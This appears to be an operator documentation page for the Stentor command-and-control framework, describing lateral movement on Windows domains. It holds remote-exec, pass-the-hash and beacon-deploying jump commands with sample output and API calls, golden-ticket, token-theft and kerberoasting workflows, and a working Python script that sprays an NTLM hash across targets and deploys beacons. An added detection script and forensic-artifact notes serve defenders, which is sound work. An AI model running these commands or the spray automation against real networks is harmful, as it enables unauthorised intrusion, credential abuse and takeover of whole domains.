
Lateral Movement

Lateral movement in Stentor uses three command families: remote-exec runs a single command on a remote host and returns its output, pth does the same but authenticates with an NTLM hash instead of a password, and jump deploys a new beacon. Four transports are available, PsExec (SMB service execution), WMI (DCOM), WinRM, and DCOM objects, each with different protocol requirements and OPSEC profiles; Pass-the-Hash reuses the SMB service-execution transport with hash-based NTLM authentication.

sequenceDiagram
    participant A as Beacon A
    participant T as Target Host
    participant C as C2 Server

    A->>T: Lateral technique (SMB/WMI/WinRM/DCOM)
    T->>T: Execute payload (service/process/script)
    T->>C: New beacon callback
    Note over C: Beacon B now active on Target

MITRE ATT&CK

PsExec, WinRM and DCOM map to sub-techniques of T1021 - Remote Services. WMI maps to T1047 - Windows Management Instrumentation. Pass-the-Hash maps to T1550.002 and Pass-the-Ticket to T1550.003, both under T1550 - Use Alternate Authentication Material.


Lateral Movement Comparison Table

| Technique     | Command            | Protocol   | Port(s)       | Credential Type  | OPSEC Impact | MITRE ATT&CK |
|---------------|--------------------|------------|---------------|------------------|--------------|--------------|
| PsExec        | remote-exec psexec | SMB        | 445           | Password / Token | High         | T1021.002    |
| WMI           | remote-exec wmi    | DCOM/RPC   | 135 + dynamic | Password / Token | Medium       | T1047        |
| WinRM         | remote-exec winrm  | HTTP/HTTPS | 5985/5986     | Password / Token | Medium       | T1021.006    |
| DCOM          | remote-exec dcom   | DCOM/RPC   | 135 + dynamic | Password / Token | Medium       | T1021.003    |
| Pass-the-Hash | pth                | SMB        | 445           | NTLM hash        | Medium       | T1550.002    |
| Jump PsExec   | jump psexec        | SMB        | 445           | Current token    | High         | T1021.002    |
| Jump WinRM    | jump winrm         | HTTP       | 5985          | Current token    | Medium       | T1021.006    |

Remote Execution Commands

The remote-exec commands run a single command on a remote host and return the output. They do not deploy a new beacon — for that, use jump.

remote-exec psexec

PsExec-style service execution via SMB (T1021.002). Connects to the target's SCM over SMB (port 445), creates a temporary service with a random name, executes the command, reads output from a named pipe, and cleans up.

beacon> remote-exec psexec 10.10.10.50 "whoami /all" admin P@ssw0rd DOMAIN
[*] Connecting to 10.10.10.50 via SMB...
[*] Service created: stentorsvc_a3f8b2c1
[*] Output:
    DOMAIN\admin
    ...
[*] Service deleted, cleanup complete

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "remote-exec psexec 10.10.10.50 \"whoami /all\" admin P@ssw0rd DOMAIN"}'

OPSEC

Forensic artifacts: Windows service creation (System Event ID 7045 with the random service name stentorsvc_XXXX; Security Event ID 4697 where service-installation auditing is enabled). Service binary uploaded to the ADMIN$ share via SMB, i.e. a new executable written directly into C:\Windows (Security Event ID 5145 if object-access auditing covers the share). Network logon on the target (Security Event ID 4624, Logon Type 3). Service start (Event ID 7036). The service is deleted after execution, but the event log entries persist.

MITRE ATT&CK: T1021.002 — Remote Services: SMB/Windows Admin Shares

remote-exec wmi

WMI execution via COM API (T1047). Connects to the target's WMI namespace over DCOM (port 135 + dynamic RPC), creates a Win32_Process via IWbemServices::ExecMethod. Uses direct COM API — does not spawn wmic.exe.

beacon> remote-exec wmi 10.10.10.50 "ipconfig /all" admin P@ssw0rd DOMAIN
[*] Connecting to 10.10.10.50 via WMI (COM API)...
[*] Win32_Process.Create executed successfully (PID: 4832)

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "remote-exec wmi 10.10.10.50 \"ipconfig /all\" admin P@ssw0rd DOMAIN"}'

OPSEC

Forensic artifacts: a process started with WmiPrvSE.exe as its parent on the target (Sysmon Event ID 1, or Security Event ID 4688 with process auditing), which is the direct signature of Win32_Process.Create. Microsoft-Windows-WMI-Activity/Operational entries for the remote operation. Network logon on the target (Security Event ID 4624, Logon Type 3). RPC traffic on port 135 + dynamic ports. Sysmon Event ID 19/20/21 (WMI filter, consumer and binding) fire only if a WMI event subscription is created, which a plain Win32_Process.Create call does not do; see wmi_cleanup for subscriptions. No child wmic.exe process (direct COM).

MITRE ATT&CK: T1047 — Windows Management Instrumentation

Output capture

WMI Win32_Process.Create does not return command output directly. For output retrieval, redirect to a file on the target and read it via SMB, or use WinRM instead.

remote-exec winrm

WinRM execution via Windows Remote Shell (T1021.006). Connects to the target's WinRM service (port 5985 HTTP or 5986 HTTPS) and executes the command via the Windows Remote Shell protocol.

beacon> remote-exec winrm 10.10.10.50 "whoami /priv" admin P@ssw0rd DOMAIN
[*] Connecting to 10.10.10.50 via WinRM...
[*] Output:
    PRIVILEGES INFORMATION
    ...

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "remote-exec winrm 10.10.10.50 \"whoami /priv\" admin P@ssw0rd DOMAIN"}'

OPSEC

Forensic artifacts: WinRM operational log entries (Microsoft-Windows-WinRM/Operational Event ID 91, which records the WSMan shell creation, and 168). Network logon on the target (Security Event ID 4624, Logon Type 3). The command runs as a child of winrshost.exe, the Windows Remote Shell host, so process-creation telemetry (Sysmon Event ID 1 / Security 4688) exposes that parent. HTTP traffic on port 5985 (or HTTPS 5986). PowerShell script block logging captures the command only when the command itself invokes PowerShell; a plain cmd-style command leaves no script block.

MITRE ATT&CK: T1021.006 — Remote Services: Windows Remote Management

Best for output

WinRM natively returns command output, making it the best choice when you need to see results. It also supports HTTPS (port 5986) for TLS transport. Over plain HTTP the SOAP payload is still protected by NTLM/Kerberos message-level encryption unless AllowUnencrypted is enabled on the target, but the endpoint, protocol and authentication exchange remain visible to network monitoring.

remote-exec dcom

DCOM-based execution via COM objects (T1021.003). Uses COM objects like ShellBrowserWindow or MMC20.Application for remote command execution over DCOM (port 135 + dynamic RPC). ShellBrowserWindow is hosted by explorer.exe, so it only works when a user is logged on interactively to the target; MMC20.Application is activated on demand in mmc.exe and has no such dependency. Both need the RPC dynamic port range to be reachable, which the Windows Firewall blocks unless the corresponding inbound rules are enabled.

beacon> remote-exec dcom 10.10.10.50 "calc.exe" admin P@ssw0rd DOMAIN
[*] Connecting to 10.10.10.50 via DCOM...
[*] Process created via ShellBrowserWindow

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "remote-exec dcom 10.10.10.50 \"calc.exe\" admin P@ssw0rd DOMAIN"}'

OPSEC

Forensic artifacts: the command appears as a child of the COM server's host process, explorer.exe for ShellBrowserWindow or mmc.exe for MMC20.Application (Sysmon Event ID 1 / Security 4688); an mmc.exe started by the DcomLaunch service host on a machine with no interactive session is a strong signal. Network logon on the target (Security Event ID 4624, Logon Type 3). RPC traffic on port 135 followed by a dynamic high port. Windows does not log COM object instantiation by default; DCOM permission errors (System Event ID 10016) appear only when activation is denied.

MITRE ATT&CK: T1021.003 — Remote Services: Distributed Component Object Model


Pass-the-Hash

pth

Authenticate to a remote host using an NTLM hash instead of a cleartext password (T1550.002). Uses SMB2 with NTLM hash-based authentication via go-smb2 NTLMInitiator, then runs the command through the same ADMIN$ service-execution path as remote-exec psexec. The account must be a local administrator on the target. For local (non-domain) accounts, only the built-in RID 500 Administrator receives a full token over the network unless LocalAccountTokenFilterPolicy is set to 1; other local admins are stopped at ADMIN$ by UAC remote restrictions. Targets that restrict NTLM (Network security: Restrict NTLM) reject the logon outright.

Hash format: LM:NT or just NT (32-character hex). The LM hash is ignored by modern Windows, so aad3b435b51404eeaad3b435b51404ee (the empty LM hash) can be used as a placeholder.

beacon> pth 10.10.10.50 admin aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 "whoami" DOMAIN
[*] Authenticating to 10.10.10.50 via Pass-the-Hash (SMB2)...
[*] ADMIN$ share access verified
[*] Service created, executing command...
[*] Output: DOMAIN\admin

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "pth 10.10.10.50 admin aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 \"whoami\" DOMAIN"}'

OPSEC

Forensic artifacts: NTLM authentication on the target (Security Event ID 4624, Logon Type 3, Authentication Package NTLM) and credential validation (Event ID 4776, on the domain controller for domain accounts and on the target for local accounts). Because the target is addressed by IP, NTLM is used even where Kerberos would normally be negotiated, which stands out on networks that expect Kerberos for domain accounts. SMB session establishment. Same service creation artifacts as PsExec (Event ID 7045) when executing commands.

MITRE ATT&CK: T1550.002 — Use Alternate Authentication Material: Pass the Hash
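The artifacts listed in the OPSEC notes for remote-exec psexec, remote-exec wmi, remote-exec winrm, remote-exec dcom and pth, turned into detection logic. This is an added example, not Stentor code or any vendor's rule set: the events are constructed samples in a flat dict form using the field names of the Windows events they stand for, and the watched-account list and service-name pattern are assumptions to tune per environment. It runs offline.

```python
"""Detection logic for the host-side artifacts of PsExec/pth service
installs, NTLM network logons, and commands spawned by the WMI, WinRM and
DCOM server processes on the target.

Added example (not Stentor code). Events are constructed samples in a flat
dict form with the field names of the Windows events they stand for; a real
pipeline would feed EVTX/XML or a SIEM export into detect().
"""
import re
from typing import Dict, Iterable, List

# Service names seen on this page (stentorsvc_a3f8b2c1, stentorsvc_7a2b):
# word, underscore, hex suffix. Assumed pattern; tune for the environment.
RANDOM_SERVICE = re.compile(r"^[a-z]+_[0-9a-f]{4,16}$", re.IGNORECASE)
ADMIN_SHARE_ROOT = "c:\\windows\\"  # ADMIN$ maps here

# Target-side host processes for remote execution; their children are the
# commands run over each transport.
REMOTE_EXEC_PARENTS = {
    "wmiprvse.exe": "wmi_child",       # Win32_Process.Create (T1047)
    "winrshost.exe": "winrm_child",    # Windows Remote Shell (T1021.006)
    "wsmprovhost.exe": "winrm_child",  # PowerShell remoting (T1021.006)
    "mmc.exe": "dcom_child",           # MMC20.Application (T1021.003)
}
# Accounts whose NTLM network logons warrant a look (constructed watchlist).
WATCHED_ACCOUNTS = {"admin", "administrator"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[Dict]) -> List[Dict]:
    alerts = []
    for e in events:
        eid = e["EventID"]
        if eid == 7045:
            # Binary dropped straight into C:\Windows (the ADMIN$ root) or a
            # random-looking service name: PsExec-style execution (T1021.002).
            path = e["ImagePath"].strip('"').lower()
            in_admin_root = (path.startswith(ADMIN_SHARE_ROOT)
                             and "\\" not in path[len(ADMIN_SHARE_ROOT):])
            if in_admin_root or RANDOM_SERVICE.match(e["ServiceName"]):
                alerts.append({"rule": "psexec_service", "host": e["Computer"],
                               "detail": f'{e["ServiceName"]} -> {e["ImagePath"]}'})
        elif eid == 4624:
            # NTLM network logon for a watched account. Pass-the-Hash always
            # lands here; Kerberos-authenticated logons do not.
            if (e.get("LogonType") == 3
                    and e.get("AuthenticationPackageName", "").upper() == "NTLM"
                    and e.get("TargetUserName", "").lower() in WATCHED_ACCOUNTS):
                alerts.append({"rule": "ntlm_admin_logon", "host": e["Computer"],
                               "detail": f'{e["TargetUserName"]} from {e.get("IpAddress")}'})
        elif eid in (1, 4688):
            # Sysmon 1 uses Image/ParentImage; Security 4688 uses
            # NewProcessName/ParentProcessName.
            parent = _basename(e.get("ParentImage") or e.get("ParentProcessName") or "")
            child = e.get("Image") or e.get("NewProcessName") or ""
            rule = REMOTE_EXEC_PARENTS.get(parent)
            if rule:
                alerts.append({"rule": rule, "host": e["Computer"],
                               "detail": f"{parent} -> {_basename(child)}"})
    return alerts


# Constructed sample telemetry from one target host (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WS50", "ServiceName": "stentorsvc_a3f8b2c1",
     "ImagePath": "C:\\Windows\\stentorsvc_a3f8b2c1.exe"},
    {"EventID": 7045, "Computer": "WS50", "ServiceName": "wuauserv",
     "ImagePath": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"EventID": 4624, "Computer": "WS50", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "admin", "IpAddress": "10.10.10.20"},
    {"EventID": 4624, "Computer": "WS50", "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "admin", "IpAddress": "10.10.10.20"},
    {"EventID": 1, "Computer": "WS50", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
    {"EventID": 1, "Computer": "WS50", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"EventID": 4688, "Computer": "WS50", "NewProcessName": "C:\\Windows\\System32\\calc.exe",
     "ParentProcessName": "C:\\Windows\\System32\\mmc.exe"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["rule"], a["host"], a["detail"])
```

The explorer.exe parent used by ShellBrowserWindow is deliberately not in REMOTE_EXEC_PARENTS: every interactive user's commands have that parent, so it needs correlation with a preceding Logon Type 3 from the same source rather than a bare parent check.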

Hash sources

NTLM hashes can be obtained from: hashdump (local SAM), logonpasswords (LSASS memory), dcsync (domain replication), or ntds_dump (AD database). See the Credential Access page for details.


Jump Commands (Beacon Deployment)

The jump commands deploy a new beacon on a remote host. Unlike remote-exec (which runs a command and returns output), jump generates a beacon payload for the specified listener and delivers it to the target.

Authentication

Jump commands use the current impersonation token for authentication. Set credentials first using make_token or steal_token before running jump commands. See the Privilege Escalation page for token manipulation details.

jump psexec

Deploy a beacon via PsExec service creation (T1021.002). Generates an x86 beacon EXE for the specified listener, uploads it to the target's ADMIN$ share via SMB, creates a Windows service pointing to the uploaded binary, and starts the service.

beacon> jump psexec 10.10.10.50 https-listener
[*] Uploading beacon to \\10.10.10.50\ADMIN$\stentorsvc_7a2b.exe
[*] Service stentorsvc_7a2b created and started
[+] New beacon: DOMAIN\admin @ 10.10.10.50 (SYSTEM)

curl -s -X POST https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "jump psexec 10.10.10.50 https-listener"}'

OPSEC

Service binary uploaded to ADMIN$ share. Service creation event (Event ID 7045). The beacon runs as SYSTEM (service context). Service is cleaned up after beacon connects.

jump psexec64

Same as jump psexec but generates an x64 beacon payload. Use on 64-bit targets for native execution.

beacon> jump psexec64 10.10.10.50 https-listener

jump psexec_psh

Deploy beacon via PsExec with a PowerShell stager. Creates a service that runs powershell.exe with an encoded beacon download cradle instead of uploading a service binary.

beacon> jump psexec_psh 10.10.10.50 https-listener

OPSEC

Spawns powershell.exe on the target host. PowerShell script block logging and AMSI may detect the stager. Higher detection surface than binary-based jump variants. Use jump psexec or jump psexec64 in monitored environments.

jump winrm

Deploy beacon via WinRM (T1021.006). Generates a PowerShell stager and executes it on the target via WinRM.

beacon> jump winrm 10.10.10.50 https-listener
[*] Executing PowerShell stager via WinRM on 10.10.10.50
[+] New beacon: DOMAIN\admin @ 10.10.10.50

jump winrm64

Same as jump winrm but generates an x64 beacon payload.

beacon> jump winrm64 10.10.10.50 https-listener

WinRM vs PsExec for jump

  • PsExec jump runs as SYSTEM (service context) — useful for full system access
  • WinRM jump runs as the authenticated user — useful when you want to maintain the user context
  • PsExec requires SMB (port 445); WinRM requires HTTP (port 5985) or HTTPS (port 5986)

Pass-the-Ticket

Pass-the-Ticket (T1550.003) uses Kerberos tickets instead of passwords or NTLM hashes for authentication. Tickets can be forged (golden/silver/diamond) or extracted from memory.

Workflow

  1. Obtain a Kerberos ticket — Forge with golden_ticket, silver_ticket, or diamond_ticket (see Credential Access), or extract from LSASS with logonpasswords
  2. Import the ticket — Use kerberos_ticket_use or kerberos_ccache_use
  3. Move laterally — Run jump or remote-exec commands, which will authenticate using the imported ticket. Address the target by hostname (dc01.corp.local in the examples below), not by IP: Kerberos needs a service principal name for the target, and an IP address falls back to NTLM, which cannot use the ticket.
# Forge a golden ticket
beacon> golden_ticket /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:e19ccf75ee54e06b06a5907af13cef42

# Import the ticket
beacon> kerberos_ticket_use /path/to/ticket.kirbi
[*] Kerberos ticket imported

# Move laterally using the ticket
beacon> jump psexec dc01.corp.local https-listener
[+] New beacon: CORP\Administrator @ DC01 (SYSTEM)

# Import ccache format (from Linux tools like impacket)
beacon> kerberos_ccache_use /path/to/ticket.ccache
[*] Kerberos ccache imported

Cross-reference

For ticket forging details (golden_ticket, silver_ticket, diamond_ticket, sapphire_ticket), see the Credential Access page.


Credential Handling

Lateral movement commands accept credentials in four ways:

| Method          | How to set                                                         | Used by              |
|-----------------|--------------------------------------------------------------------|----------------------|
| Password        | Inline: remote-exec <method> <target> <cmd> <user> <pass> [domain] | remote-exec commands |
| NTLM hash       | Inline: pth <target> <user> <hash> <cmd> [domain]                  | pth command          |
| Current token   | Pre-set: make_token or steal_token before jump                     | jump commands        |
| Kerberos ticket | Pre-import: kerberos_ticket_use before jump/remote-exec            | All commands         |

Token precedence

If you have an active impersonation token (from make_token or steal_token), it takes precedence for network authentication. Use rev2self to clear impersonation before using inline credentials.


WMI Cleanup

wmi_cleanup

Remove WMI event subscriptions left by WMI-based execution. WMI event subscriptions persist until explicitly removed and can serve as indicators of compromise.

beacon> wmi_cleanup 10.10.10.50 SentorWMI_a3f8
[*] WMI event subscription 'SentorWMI_a3f8' removed from 10.10.10.50

Always clean up

After using WMI for lateral movement, run wmi_cleanup to remove event subscriptions. Lingering WMI subscriptions are a common detection vector and persistence artifact.


Operator Workflows

Credential Spray Workflow

Use harvested hashes to identify admin access, then deploy a beacon:

# Dump local hashes
beacon> hashdump
[*] admin:1001:aad3b435...:e19ccf75ee54e06b06a5907af13cef42:::

# Verify admin access on target via PtH
beacon> pth 10.10.10.50 admin aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 "whoami" DOMAIN
[*] Output: DOMAIN\admin

# Deploy beacon: jump authenticates with the current token, and make_token
# needs the cleartext password, so crack the hash first (with the hash only,
# stay on pth for command execution)
beacon> make_token DOMAIN\admin P@ssw0rd
beacon> jump psexec 10.10.10.50 https-listener
[+] New beacon on 10.10.10.50
beacon> rev2self
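The same spray as a script against the cockpit REST API, so that many targets can be checked before any beacon is deployed. This is an added example, not Stentor's own client: it uses only the endpoint shown in the curl examples on this page and assumes the response is JSON with the console text in an "output" field (adjust http_sender if the real schema differs). The sender is injectable, and stub_sender with its canned output is constructed so the flow runs offline.

```python
"""Scripting the credential-spray workflow against the cockpit API.

Added example, not Stentor's own client or API documentation. Uses only the
endpoint this page shows (POST /api/v1/cockpit/beacons/<id>/shell with a JSON
"command") and ASSUMES the response is JSON carrying the console text in an
"output" field. The sender is injectable so the flow runs offline.
"""
import json
import urllib.request
from typing import Callable, Dict, Iterable, Optional, Set

Sender = Callable[[str], str]  # beacon command text -> console output


def http_sender(base_url: str, token: str, beacon_id: str) -> Sender:
    """Real transport: one POST per command, as the curl examples do."""
    url = f"{base_url}/api/v1/cockpit/beacons/{beacon_id}/shell"

    def send(command: str) -> str:
        req = urllib.request.Request(
            url, method="POST",
            data=json.dumps({"command": command}).encode(),
            headers={"Authorization": f"Bearer {token}",
                     "Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=120) as resp:
            return json.loads(resp.read())["output"]  # assumed response field
    return send


def pth_confirms_admin(send: Sender, target: str, user: str, nt_hash: str, domain: str) -> bool:
    """pth needs ADMIN$ access to run anything, so a whoami that comes back
    as the expected account proves local admin on the target."""
    out = send(f'pth {target} {user} {nt_hash} "whoami" {domain}')
    return "[*] Output:" in out and f"{domain}\\{user}".lower() in out.lower()


def spray_and_jump(send: Sender, targets: Iterable[str], user: str, nt_hash: str,
                   domain: str, listener: str, password: Optional[str] = None) -> Dict[str, str]:
    """Verify admin with the hash on every target, then deploy a beacon where
    it succeeded. jump authenticates with the current token and make_token
    needs a cleartext password, so with a hash only we stop at 'admin'."""
    results: Dict[str, str] = {}
    for target in targets:
        if not pth_confirms_admin(send, target, user, nt_hash, domain):
            results[target] = "no-access"
            continue
        if password is None:
            results[target] = "admin"
            continue
        send(f"make_token {domain}\\{user} {password}")
        try:
            out = send(f"jump psexec {target} {listener}")
            results[target] = "beacon" if "[+] New beacon" in out else "jump-failed"
        finally:
            # Token precedence: drop the impersonation so later inline-credential
            # commands on this beacon are not silently routed through it.
            send("rev2self")
    return results


def stub_sender(admin_hosts: Set[str]) -> Sender:
    """Offline stand-in for the API with constructed console output."""
    def send(command: str) -> str:
        parts = command.split()
        if parts[0] == "pth":
            target, user, domain = parts[1], parts[2], parts[-1]
            if target in admin_hosts:
                return f"[*] ADMIN$ share access verified\n[*] Output: {domain}\\{user}"
            return "[!] Authentication failed or ADMIN$ access denied"
        if parts[0] == "jump":
            return f"[+] New beacon on {parts[2]}"
        return "[*] ok"
    return send


if __name__ == "__main__":
    send = stub_sender({"10.10.10.50"})
    print(spray_and_jump(send, ["10.10.10.50", "10.10.10.51"], "admin",
                         "aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42",
                         "DOMAIN", "https-listener", password="P@ssw0rd"))
```

Every pth probe is a network logon and, on success, a service install on the target, so a wide spray multiplies the 4624/7045 artifacts described in the OPSEC notes above; keep the target list deliberate rather than scanning a whole subnet.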

Token-Based Lateral Movement

Use a stolen token for lateral movement without knowing credentials:

# Find a domain admin process
beacon> ps
[*] PID   PPID  Name            User
    1234  456   explorer.exe    DOMAIN\DomainAdmin

# Steal the token and move laterally
beacon> steal_token 1234
[*] Impersonating DOMAIN\DomainAdmin

beacon> jump winrm dc01.corp.local https-listener
[+] New beacon: DOMAIN\DomainAdmin @ DC01

beacon> rev2self

Kerberos Lateral Movement

Kerberoast a service account, crack offline, then move:

# Kerberoast to find crackable service accounts
beacon> kerberoast
[*] SPN: MSSQLSvc/sql01.corp.local - hash saved

# After offline cracking...
beacon> make_token DOMAIN\svc_sql CrackedP@ss
[*] Impersonating DOMAIN\svc_sql (network logon)

beacon> jump psexec sql01.corp.local https-listener
[+] New beacon on sql01.corp.local

beacon> rev2self

Golden Ticket Lateral Movement

Forge a TGT and use it for unrestricted lateral movement:

# Forge golden ticket (requires krbtgt hash from DCSync)
beacon> golden_ticket /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:e19ccf75...

# Import the forged ticket
beacon> kerberos_ticket_use ticket.kirbi

# Move to any host in the domain
beacon> jump psexec dc01.corp.local https-listener
[+] New beacon: CORP\Administrator @ DC01 (SYSTEM)

beacon> jump psexec fileserver.corp.local https-listener
[+] New beacon: CORP\Administrator @ FILESERVER (SYSTEM)